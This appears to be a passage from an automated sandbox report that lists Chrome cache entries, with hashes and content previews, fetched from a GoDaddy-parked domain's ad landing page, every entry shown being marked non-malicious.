                                                                          Preview:if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"www.google.com",hash:"12000867581486223255",packages:"domains",module:"ads",version:"1",m:{cei:"17301431,17301433,17301436,17301511,17301516,17301266",ah:true,uatm:500,ecfc2:true,llrm:1000,lldl:"bS5zZWFycy5jb20=",abf:{"_disableAdRequestForNewConsentStrategy":true,"_enableNewConsentStrategy":true,"_fixCtcLinksOnIos":true,"_googEnableQup":true,"_switchGwsRequestToUseAdsenseDomain":true,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog"}};var m;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ca=typeof Object

                                                                          Chrome Cache Entry: 107

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):200
                                                                          Entropy (8bit):5.032268383518208
                                                                          Encrypted:false
                                                                          SSDEEP:3:t6WCCD/TSLvDmJS4RKb5sAR+hHiATcvXjXRHRcBHoNcH4VNX1X3MHq09e+HjdFsH:t6q+mc4slhohC/vmI4SmK0xhFELE47zF
                                                                          MD5:CDA1EC3580305080544D05765D14B5D5
                                                                          SHA1:49E3B7057B2A02843876BD4BA2D12629C53766C5
                                                                          SHA-256:81C042CDE00D76A79AEB2C402BF93BD34E31B3A0061D484519052E094686C75D
                                                                          SHA-512:FFEC368162234B6BBEF9791AA24013D256EB8660EDE3AB5A30225F91B6948710BA20A28C16213841494AEE550BE3B0095F8EF4A9F61B749EA61112C17CC5300B
                                                                          Malicious:false
                                                                          URL:https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/chevron.svg?c=%230f1c21
                                                                          Preview:<svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>

                                                                          Chrome Cache Entry: 108

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (1618)
                                                                          Category:downloaded
                                                                          Size (bytes):153721
                                                                          Entropy (8bit):5.54403537987035
                                                                          Encrypted:false
                                                                          SSDEEP:1536:XX/xbg4DuPemooPy7WnHPh4a2EwG19OxHRdjhJBjDSc4Y52kovgwlZXqjzsZ1Dsb:U59cjhJB7wkeesZtpmqc+VHu
                                                                          MD5:E1F8276A887B73D583AC4F09908F7B37
                                                                          SHA1:43B923E86952BFC2BFEFA40365B925C32C4AEE82
                                                                          SHA-256:B40336B0B46D7B2EDE4F6F1539AD85E8C8A7A6DE5B4F184EA941F3D2D5FA7069
                                                                          SHA-512:3F20B5D590420E8C469D9EE4761524F00E820BE8773942379019607E8E9280FDEC38BCBF4BDD6BB9D1EF509BFA71FE4B973AA9C6709F303D1AC51D22418843F1
                                                                          Malicious:false
                                                                          URL:https://syndicatedsearch.goog/adsense/domains/caf.js?pac=0
                                                                          Preview:if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"syndicatedsearch.goog",hash:"12000867581486223255",packages:"domains",module:"ads",version:"1",m:{cei:"17300003,17301431,17301433,17301436,17301511,17301515,17301516,17301266",ah:true,uatm:500,ecfc2:true,llrm:1000,lldl:"bS5zZWFycy5jb20=",abf:{"_disableAdRequestForNewConsentStrategy":true,"_enableNewConsentStrategy":true,"_fixCtcLinksOnIos":true,"_googEnableQup":true,"_switchGwsRequestToUseAdsenseDomain":true,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog"}};var m;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:

                                                                          Chrome Cache Entry: 109

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with very long lines (12974)
                                                                          Category:downloaded
                                                                          Size (bytes):24256
                                                                          Entropy (8bit):5.967861600992764
                                                                          Encrypted:false
                                                                          SSDEEP:384:2ni0Q8+t9/IQmDxvv5+Wah/FPuuzfspqNySMVtUO2:2i/8+txYDxvDahN2uzfEl5V92
                                                                          MD5:F733B2DB1463AEAFBAE38E95422B4D7F
                                                                          SHA1:ECEF91ECF6882B9F2138BAB39573A51538F973DD
                                                                          SHA-256:639183DC8567BF8ECD42BB959CCCC76698A17D165817AA0E69D6EBFDB3938EE0
                                                                          SHA-512:6293341A6ED6A1F1FF711C60C0127457561B9B1648B05B519C279F2FDC2292985E9898D3BD8577500625CE16B77F7A449A830B4EF5D1CD0D472B7597B2E59B8A
                                                                          Malicious:false
                                                                          URL:https://syndicatedsearch.goog/afs/ads?adsafe=low&adtest=off&psid=7621175430&pcsa=false&channel=06902&domain_name=onefordvd.com&client=dp-namemedia06_3ph&r=m&rpbu=https%3A%2F%2Fwww.onefordvd.com%2Flander&type=3&uiopt=true&swp=as-drid-2412708874333548&oe=UTF-8&ie=UTF-8&fexp=21404%2C17301431%2C17301433%2C17301436%2C17301511%2C17301516%2C17301266&format=r3&nocache=1741724944339990&num=0&output=afd_ads&v=3&bsl=8&pac=0&u_his=1&u_tz=-240&dt=1724944339992&u_w=1280&u_h=1024&biw=1280&bih=907&psw=1280&psh=907&frm=0&uio=-&cont=relatedLinks&drt=0&jsid=caf&nfp=1&jsv=667606770&rurl=https%3A%2F%2Fwww.onefordvd.com%2Flander&referer=http%3A%2F%2Fwww.onefordvd.com%2F
                                                                          Preview:<!doctype html><html lang="en"> <head> <style id="ssr-boilerplate">body{-webkit-text-size-adjust:100%; font-family:arial,sans-serif; margin:0;}.div{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;max-width:100%;}.span:last-child, .div:last-child{-webkit-box-flex:1 0; -webkit-flex-shrink:1; flex-shrink:1;}.a{text-decoration:none; text-transform:none; color:inherit; display:inline-block;}.span{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;display:inline-block; overflow:hidden; text-transform:none;}.img{border:none; max-width:100%; max-height:100%;}.i_{display:-ms-flexbox; display:-webkit-box; display:-webkit-flex; display:flex;-ms-flex-align:start; -webkit-box-align:start; -webkit-align-items:flex-start; align-items:flex-start;box-sizing:border-box; overflow:hidden;}.v_{-webkit-box-flex:1 0; -webkit-flex-shrink:1; flex-shrink:1;}.j_>span:last-child, .j_>div:last-child, .w_, .w_:last-child{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;}.l_{-ms-overflow

                                                                          Chrome Cache Entry: 110

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (53485)
                                                                          Category:dropped
                                                                          Size (bytes):54789
                                                                          Entropy (8bit):5.7184337937624
                                                                          Encrypted:false
                                                                          SSDEEP:768:jhGPNG7Dub8k1MufVVp8pMGry/xJlI/GZgvNpS4oPnhymHSaeCNMbUA9QK4K:jhGPMDub3lbmbyJXy1pGnhJtNMaK7
                                                                          MD5:8A4BE2DFF1E611A4A887F9C33A72745D
                                                                          SHA1:37A4CC80E94D0A04ED7D0DD9F2A744F8CC382477
                                                                          SHA-256:A9F8A66C0D0662183211328DDA01D3D3977E1E983AC2207CA650C9D5A3127F7B
                                                                          SHA-512:6B389B9F991D4A1805F540F555C4D1BF6EA8F441E4C44BC9210DE698ADCB42493DD02A3CB5D174F6855CF0E50C43638C4B74A7E2AE3504A30F401CE1B31142DC
                                                                          Malicious:false
                                                                          Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function f(R){return R}var G=function(R,v,n,g,Y,l,p,B,Q,L,b,z){for(z=63,b=n;;)try{if(z==g)break;else if(z==21)z=B&&B.createPolicy?80:15;else if(z==v)b=n,z=45;else if(z==45)z=V.console?38:R;else{if(z==R)return b=n,Q;if(z==80)b=65,Q=B.createPolicy(l,{createHTML:w,createScript:w,createScriptURL:w}),z=R;else if(z==63)Q=p,B=V.trustedTypes,z=21;else if(z==38)V.console[Y](L.message),z=R;else if(z==15)return Q}}catch(W){if(b==n)throw W;b==65&&(L=W,z=v)}},w=function(R){return f.call(this,R)},V=this||self;(0,eval)(function(R,v){return(v=G(95,96,41,35,"error","bg",null))&&R.eval(v.createScript("1"))===1?function(n){return v.createScript(n)}:function(n){return""+n}}(V)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:applicatio

                                                                          Chrome Cache Entry: 111

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                          Category:downloaded
                                                                          Size (bytes):43
                                                                          Entropy (8bit):3.0950611313667666
                                                                          Encrypted:false
                                                                          SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                          MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                          SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                          SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                          SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                          Malicious:false
                                                                          URL:https://ad-delivery.net/px.gif?ch=1&e=0.7550573385120041
                                                                          Preview:GIF89a.............!.......,...........L..;

                                                                          Chrome Cache Entry: 112

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:downloaded
                                                                          Size (bytes):987
                                                                          Entropy (8bit):5.286413651830147
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yel+TLOwoeH6fvTdm1mh9dVbc8EDzzfXaH0Z4J6:YegLpafxwmPctzyHnJ6
                                                                          MD5:FBC4998F975B7B006E2B6842D740C3BA
                                                                          SHA1:A60EEF885CA5395D51277592D721D83E7067E2A6
                                                                          SHA-256:4AA19EE4A014A03581D838565B07FDEAE449CF344F43DBB065C43D3FBB514560
                                                                          SHA-512:18361A124B6EB483450315DBBC199BBDBE8E63CAB5352E662C6377F450878913B440AE7B9CAFA22081EB6586325281C485524B0FA08B226EDBAF219FE86C9CE0
                                                                          Malicious:false
                                                                          URL:https://api.aws.parking.godaddy.com/v1/domains/domain?domain=www.onefordvd.com&portfolioId=&abp=1&gdabp=true
                                                                          Preview:{"system":"SN","account":"11d1def534ea1be0X4316293fX15bcbce510bXX2f8e ","customerId":"00000000-0000-0000-0000-000000000000","displayType":"ADS","dataSource":"INVENTORY","adSense":{"drid":"as-drid-2412708874333548","channel":"06902","pubId":"dp-namemedia06_3ph"},"domain":{"rootDomain":"onefordvd.com","expiresAt":"","status":{"internal":"ACTIVE"},"isAdult":false,"hasAuction":false},"lander":{"template":"ARROW_3","domainDisplayName":"onefordvd.com","headerText":"","footerText":"","headerHtml":"","footerHtml":"","banner":{"show":true,"text":"onefordvd.com may be for sale!","link":"http://domainretailing.com/rg-dsale3p.php?d=onefordvd.com\u0026doe=YWNtZWJpbGxpbmdjb0BnbWFpbC5jb20%3D\u0026dil=SW5xdWlyZSBhYm91dA%3D%3D\u0026ct=teMjLe7_S","type":"AFTERNIC"},"i18n":true,"showDomain":true},"experiment":{"experiment":"parking_cp_ab_01","cohort":"off","start":"","end":"","enabled":true,"data":{"targetCustomerIds":["7dbc6047-87b6-4724-9c84-1e076f5b7c3d"],"useSerpForAdsenseFail":false}}}.

                                                                          Chrome Cache Entry: 113

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (380), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):380
                                                                          Entropy (8bit):5.419278885988979
                                                                          Encrypted:false
                                                                          SSDEEP:6:xWzPvGBqUsUwrbiFOjQS5Y2HuJPTv7M+dFECzUsUwrbmHqrpDV2HuJPTvAen:xWC63wOjQHNv7H+u3+2pD5Nv7n
                                                                          MD5:5B793A9E6CF8AE22AA0E19DBC16393B7
                                                                          SHA1:F3599E6412B0FDE3F6FAAA2158DC6AC9ADF6856F
                                                                          SHA-256:9D368D9E15F9E3C0BAF498E8CFF01F6F2937F217C385D2FB9D6206042F7F6021
                                                                          SHA-512:117003AE1692C5E5ADC3A51346EA38BB41D82F7383416D59B1EBEB0139421580B789855E3D96BCE8BC18FA3B587FB8C191065CBD1E71D2F8E876B30C0C775C2B
                                                                          Malicious:false
                                                                          Preview:__sasCookie({"_cookies_":[{"_value_":"ID=634cd3604e46b9f3:T=1724944345:RT=1724944345:S=ALNI_MbLv2NIfOmVecONWetOFaZ2lojbVg","_expires_":1758640345,"_path_":"/","_domain_":"onefordvd.com","_version_":1},{"_value_":"UID=00000eac5af454e0:T=1724944345:RT=1724944345:S=ALNI_Ma7Z7IjMA4BC7OVWp6HFiwj5Iam0Q","_expires_":1758640345,"_path_":"/","_domain_":"onefordvd.com","_version_":2}]});

                                                                          Chrome Cache Entry: 114

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):391
                                                                          Entropy (8bit):4.729520059969888
                                                                          Encrypted:false
                                                                          SSDEEP:6:t6q+mc4slzTPl2O4UYaeLIT4W+KS4S1UpMTQpi6jUs8sh6B+BSmK0C:t6q+FPUPkHSt1UiT6i6jUs8b0I0C
                                                                          MD5:1DD79DF28A7517F4F8688A66EDFB04FC
                                                                          SHA1:4AA1200E3E4B50AEB64774E6667DDE9422658C38
                                                                          SHA-256:5FC5D398706CE2D79CA71EAB32AB611D4511260B2D87B9D6D74A8EF59F9BEA8F
                                                                          SHA-512:70CD8282458482ED3F123C0E61C81D1C257C2D4AF12D51674BDF46C748B576CC92CC364CB7DC49D1D7E6D5A4C11AD85AA8E798692414468F0F4531DF95ECF326
                                                                          Malicious:false
                                                                          URL:https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21
                                                                          Preview:<svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/><path d="M0 0h24v24H0z" fill="none"/></svg>.

                                                                          Chrome Cache Entry: 115

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65465)
                                                                          Category:downloaded
                                                                          Size (bytes):691127
                                                                          Entropy (8bit):5.6159903673455736
                                                                          Encrypted:false
                                                                          SSDEEP:12288:Asb1QYnTxQYnT9DUk4f0WTI4WugqciqXDEu4Om4+BcWu2:A01QYnTxQYnTF4OH6
                                                                          MD5:35DF29B922F485757F6253377D2300F4
                                                                          SHA1:E579DF30408E9EE6670F9EFC3D8CA9AF4DF04D3E
                                                                          SHA-256:83DA041AD32EE87CB3FC0938C24D77625B66C109D0124A51047518D80D89422E
                                                                          SHA-512:4E8C780A286A1D81DDE2AA3D8126DEAFD0CD5ACC94F3BF75FCD548C98061FB4DD887D4007A6C6630CDD04CB0DAE3E288A4CE4195F5946B201DAFF68A476A2869
                                                                          Malicious:false
                                                                          URL:https://img1.wsimg.com/parking-lander/static/js/main.5bbf83b7.js
                                                                          Preview:/*! For license information please see main.5bbf83b7.js.LICENSE.txt */.(()=>{var e={8665:e=>{"use strict";function t(e){return(t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}e.exports=function(){for(var e,n,r=[],o=window,i=o;i;){try{if(i.frames.__tcfapiLocator){e=i;break}}catch(e){}if(i===o.top)break;i=i.parent}e||(function e(){var t=o.document,n=!!o.frames.__tcfapiLocator;if(!n)if(t.body){var r=t.createElement("iframe");r.style.cssText="display:none",r.name="__tcfapiLocator",t.body.appendChild(r)}else setTimeout(e,5);return!n}(),o.__tcfapi=function(){for(var e=arguments.length,t=new Array(e),o=0;o<e;o++)t[o]=arguments[o];if(!t.length)return r;"setGdprApplies"===t[0]?t.length>3&&2===parseInt(t[1],10)&&"boolean"==typeof t[3]&&(n=t[3],"function"==typeof t[2]&&t[2]("set",!0)):"ping"===t[0]?"function"==typeof t[2]&&t[2]({gdprApplie

                                                                          Chrome Cache Entry: 116

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 16 colors, 32x32, 16 colors
                                                                          Category:dropped
                                                                          Size (bytes):1078
                                                                          Entropy (8bit):1.240940859118772
                                                                          Encrypted:false
                                                                          SSDEEP:3:etFEh9HYflvlNl/AXll1pe/WNN00000000000000000000000000000000000001:QNtY6+lKY6
                                                                          MD5:4123CE1E1732F202F60292941FF1487D
                                                                          SHA1:9F12B11BDE582DAE37CE8C160537D919C561C464
                                                                          SHA-256:D961B08E4321250926DE6F79087594975FE20AD1518DE8F91EB711AF5D1A6EF8
                                                                          SHA-512:11B24C2E622C408E4774FAE120B719A21A0B2ACFA53230126C35AD6CA57D33D4DE79CBE11D296CFBDE9613CAA03D66B721BD20CF4EE030CF75F5A1FD8A286DA9
                                                                          Malicious:false
                                                                          Preview:..............(...&... ..........N...(....... ...............................................................................................................................................................................................................................................................................................(... ...@.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          Chrome Cache Entry: 117

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                          Category:dropped
                                                                          Size (bytes):43
                                                                          Entropy (8bit):3.0950611313667666
                                                                          Encrypted:false
                                                                          SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                          MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                          SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                          SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                          SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                          Malicious:false
                                                                          Preview:GIF89a.............!.......,...........L..;

                                                                          Chrome Cache Entry: 87

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):200
                                                                          Entropy (8bit):5.032268383518208
                                                                          Encrypted:false
                                                                          SSDEEP:3:t6WCCD/TSLvDmJS4RKb5sAR+hHiATcvXjXRHRcBHoNcH4VNX1X3MHq09e+HjdFsH:t6q+mc4slhohC/vmI4SmK0xhFELE47zF
                                                                          MD5:CDA1EC3580305080544D05765D14B5D5
                                                                          SHA1:49E3B7057B2A02843876BD4BA2D12629C53766C5
                                                                          SHA-256:81C042CDE00D76A79AEB2C402BF93BD34E31B3A0061D484519052E094686C75D
                                                                          SHA-512:FFEC368162234B6BBEF9791AA24013D256EB8660EDE3AB5A30225F91B6948710BA20A28C16213841494AEE550BE3B0095F8EF4A9F61B749EA61112C17CC5300B
                                                                          Malicious:false
                                                                          Preview:<svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>

                                                                          Chrome Cache Entry: 88

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (53485)
                                                                          Category:downloaded
                                                                          Size (bytes):54789
                                                                          Entropy (8bit):5.7184337937624
                                                                          Encrypted:false
                                                                          SSDEEP:768:jhGPNG7Dub8k1MufVVp8pMGry/xJlI/GZgvNpS4oPnhymHSaeCNMbUA9QK4K:jhGPMDub3lbmbyJXy1pGnhJtNMaK7
                                                                          MD5:8A4BE2DFF1E611A4A887F9C33A72745D
                                                                          SHA1:37A4CC80E94D0A04ED7D0DD9F2A744F8CC382477
                                                                          SHA-256:A9F8A66C0D0662183211328DDA01D3D3977E1E983AC2207CA650C9D5A3127F7B
                                                                          SHA-512:6B389B9F991D4A1805F540F555C4D1BF6EA8F441E4C44BC9210DE698ADCB42493DD02A3CB5D174F6855CF0E50C43638C4B74A7E2AE3504A30F401CE1B31142DC
                                                                          Malicious:false
                                                                          URL:https://www.google.com/js/bg/qfimbA0GYhgyETKN2gHT05d-Hpg6wiB8plDJ1aMSf3s.js
                                                                          Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function f(R){return R}var G=function(R,v,n,g,Y,l,p,B,Q,L,b,z){for(z=63,b=n;;)try{if(z==g)break;else if(z==21)z=B&&B.createPolicy?80:15;else if(z==v)b=n,z=45;else if(z==45)z=V.console?38:R;else{if(z==R)return b=n,Q;if(z==80)b=65,Q=B.createPolicy(l,{createHTML:w,createScript:w,createScriptURL:w}),z=R;else if(z==63)Q=p,B=V.trustedTypes,z=21;else if(z==38)V.console[Y](L.message),z=R;else if(z==15)return Q}}catch(W){if(b==n)throw W;b==65&&(L=W,z=v)}},w=function(R){return f.call(this,R)},V=this||self;(0,eval)(function(R,v){return(v=G(95,96,41,35,"error","bg",null))&&R.eval(v.createScript("1"))===1?function(n){return v.createScript(n)}:function(n){return""+n}}(V)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:applicatio

                                                                          Chrome Cache Entry: 89

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (57339)
                                                                          Category:downloaded
                                                                          Size (bytes):57340
                                                                          Entropy (8bit):5.401678356168753
                                                                          Encrypted:false
                                                                          SSDEEP:768:bemBuCcWxlPBJTEXIx5fR3VC/t1uYGW4hxaHNWy5N81Dju0GeNwXalBfDlOk7rr:zurqBaIzTCVcTqKZ5zDlOsr
                                                                          MD5:018A47EE5CE4DC09D3E5CEBC51E6256C
                                                                          SHA1:0481F7419F0581EC155AF41EB09027EDE1C64E09
                                                                          SHA-256:92FFB2AB4252AA702418251B600DC6790B589F3DEA50DACB90FC8B80FBF10802
                                                                          SHA-512:8BCF5B2CFF14ED4316543DB47B21EF148ADD8BC6D43D58504671F40EB144D29D6E614A664BE65DC794874984DF3E6589203E674F0C086F4B1E822D3A1C3E9A73
                                                                          Malicious:false
                                                                          URL:https://btloader.com/tag?o=5097926782615552&upapi=true
                                                                          Preview:!function(){"use strict";var e=function(){return e=Object.assign||function(e){for(var t,n=1,s=arguments.length;n<s;n++)for(var r in t=arguments[n])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e},e.apply(this,arguments)};function t(e,t,n,s){return new(n||(n=Promise))((function(r,i){function o(e){try{c(s.next(e))}catch(e){i(e)}}function a(e){try{c(s.throw(e))}catch(e){i(e)}}function c(e){var t;e.done?r(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(o,a)}c((s=s.apply(e,t||[])).next())}))}function n(e,t){var n,s,r,i,o={label:0,sent:function(){if(1&r[0])throw r[1];return r[1]},trys:[],ops:[]};return i={next:a(0),throw:a(1),return:a(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function a(i){return function(a){return function(i){if(n)throw new TypeError("Generator is already executing.");for(;o;)try{if(n=1,s&&(r=2&i[0]?s.return:i[0]?s.throw||((r=s.return)&&r.call(s),0):s.next)&&!(r=r.call(s,i[1])).done)return r;switch(s=

                                                                          Chrome Cache Entry: 90

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with very long lines (619)
                                                                          Category:downloaded
                                                                          Size (bytes):620
                                                                          Entropy (8bit):5.148034538353215
                                                                          Encrypted:false
                                                                          SSDEEP:12:qTE0L26zFtAiSTFzU1UgYTJ5HSQHWVWSPD3LyVe2KPD3LqDsTbk:0E0LRzKTFjpn2WSaVpKSY/k
                                                                          MD5:8117A5188FFE6C4CD6C20DC344A14EF9
                                                                          SHA1:35AF3E72D99FE141FD469AE8AD40F284CAFB0B96
                                                                          SHA-256:42120BC8AC15E5139DF5594E8A5BEA9A74A681DA1C949B0EA6698BAD381F078D
                                                                          SHA-512:AD759E7F5210D080D85DD93129845F5085662F34390D1BC0D5E9673A484A3799D80E8C14B96AE4893449CF33DE599B3677873BE23F3ACFA4A65038A9E8DD0050
                                                                          Malicious:false
                                                                          URL:https://www.onefordvd.com/lander
                                                                          Preview:<!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=true"></script><script src="https://btloader.com/tag?o=5097926782615552&upapi=true" async></script><script>window.LANDER_SYSTEM="CP"</script><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/main.5bbf83b7.js"></script><link href="https://img1.wsimg.com/parking-lander/static/css/main.ef90a627.css" rel="stylesheet"></head><body><div id="root"></div></body></html>.

                                                                          Chrome Cache Entry: 91

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                          Category:dropped
                                                                          Size (bytes):43
                                                                          Entropy (8bit):3.0950611313667666
                                                                          Encrypted:false
                                                                          SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                          MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                          SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                          SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                          SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                          Malicious:false
                                                                          Preview:GIF89a.............!.......,...........L..;

                                                                          Chrome Cache Entry: 92

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                          Category:downloaded
                                                                          Size (bytes):43
                                                                          Entropy (8bit):3.0950611313667666
                                                                          Encrypted:false
                                                                          SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                          MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                          SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                          SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                          SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                          Malicious:false
                                                                          URL:https://ad-delivery.net/px.gif?ch=1&e=0.7379176731179411
                                                                          Preview:GIF89a.............!.......,...........L..;

                                                                          Chrome Cache Entry: 93

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (57339)
                                                                          Category:dropped
                                                                          Size (bytes):57340
                                                                          Entropy (8bit):5.401678356168753
                                                                          Encrypted:false
